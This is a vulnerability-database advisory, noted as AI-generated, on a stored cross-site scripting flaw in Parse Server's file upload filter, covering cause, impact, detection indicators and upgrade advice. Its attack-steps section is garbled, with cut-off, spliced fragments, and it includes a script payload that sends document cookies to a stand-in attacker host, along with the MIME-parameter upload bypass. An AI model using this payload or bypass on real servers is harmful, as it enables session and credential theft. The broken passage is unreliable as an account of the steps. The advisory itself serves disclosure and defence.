
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-32728 is a stored Cross-Site Scripting (XSS) vulnerability in Parse Server, an open-source Node.js backend framework, caused by a file extension filter bypass via Content-Type MIME parameters and missing XML extension blocklist entries. Disclosed on March 13, 2026, it affects Parse Server versions prior to 8.6.41 and versions 9.0.0 through 9.6.0-alpha.14. It carries a CVSS v3.1 base score of 7.6 (High) and a CVSS v4.0 base score of 8.3 (High) (GitHub Advisory, Parse Server Advisory).
The root cause (CWE-79) lies in two related flaws in Parse Server's FilesRouter.js: first, the file extension validation logic failed to strip MIME parameters (e.g., ;charset=utf-8) appended to the Content-Type header before matching against the blocklist regex, allowing the regex to fail to match dangerous types like application/xhtml+xml;charset=utf-8; second, several XML-based extensions capable of rendering active content in browsers (xsd, rng, rdf, rdf+xml, owl, mathml, mathml+xml) were absent from the default blocklist entirely. An authenticated attacker with file upload privileges could exploit either or both weaknesses by crafting an HTTP POST request to the file upload endpoint with a manipulated Content-Type header or a blocked-but-missing extension, causing malicious active content to be stored and served under the application's domain (GitHub Advisory, Patch Commit v9).
Successful exploitation enables stored XSS attacks, where malicious scripts are persistently hosted under the application's own domain and executed in victims' browsers when they access the uploaded content. This can lead to theft of session tokens, user credentials, and other sensitive data stored in the browser's local storage, potentially enabling account takeover and lateral movement within the application. Confidentiality impact is rated High and integrity impact Low, with no direct availability impact (GitHub Advisory, Parse Server Advisory).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of disclosure (GitHub Advisory). The vulnerability requires low privileges (an account with file upload access) and passive user interaction (a victim must visit or load the malicious file). The EPSS score is approximately 0.05% (3rd percentile), indicating a low near-term exploitation probability. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.
<script>document.location='https://attacker.com/?c='+document.cookie</script>)./1/files/payload) with the Content-Type header set to a blocked type appended with a MIME parameter, such as application/xhtml+xml;charset=utf-8. The unpatched server fails to strip the ;charset=utf-8 suffix before regex matching, allowing the upload to succeed..xsd, .rng, .owl, .mathml) using its corresponding XML MIME type, which the unpatched server does not block.localStorage to an attacker-controlled server (GitHub Advisory, Patch Commit v9)./1/files/<filename>) with Content-Type headers containing MIME parameters such as ;charset=utf-8 appended to XML/HTML MIME types (e.g., application/xhtml+xml;charset=utf-8, image/svg+xml;charset=utf-8, text/html;charset=utf-8).xsd, rng, rdf, owl, mathml using XML MIME types to the file upload endpoint on unpatched servers..xsd, .rng, .rdf, .owl, .mathml, .xhtml, .svg, .xml, or similar active-content extensions in the Parse Server file storage directory or connected object storage bucket.201 Created responses for file uploads with the above suspicious Content-Type values or file extensions that should have been blocked.Upgrade Parse Server to version 8.6.41 (for the v8 branch) or 9.6.0-alpha.15 / 9.6.0 or later (for the v9 branch), which strip MIME parameters from the Content-Type header before extension validation and extend the default blocklist to include xsd, rng, rdf, rdf+xml, owl, mathml, and mathml+xml (GitHub Advisory, Parse Server Advisory). As a workaround for those unable to upgrade immediately, configure the fileUpload.fileExtensions option as an allowlist of only the specific file extensions your application legitimately requires (e.g., ["^jpg$", "^png$", "^pdf$"]), rather than relying on the default blocklist. The Parse Server maintainers explicitly recommend the allowlist approach as the long-term security best practice, since new dangerous extensions may emerge that are not covered by any default blocklist (Parse Server Advisory).
The vulnerability was reported by security researcher fancymalware and coordinated by Parse Server maintainer mtrezza, who published the advisory and patches on March 13, 2026 (Parse Server Advisory). RedPacketSecurity flagged the CVE on social media (Mastodon and X/Twitter) shortly after NVD publication, contributing to broader community awareness. The fix was included in the stable Parse Server 9.6.0 release on March 22, 2026, alongside a large batch of other security fixes, reflecting an active security hardening effort by the Parse community.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."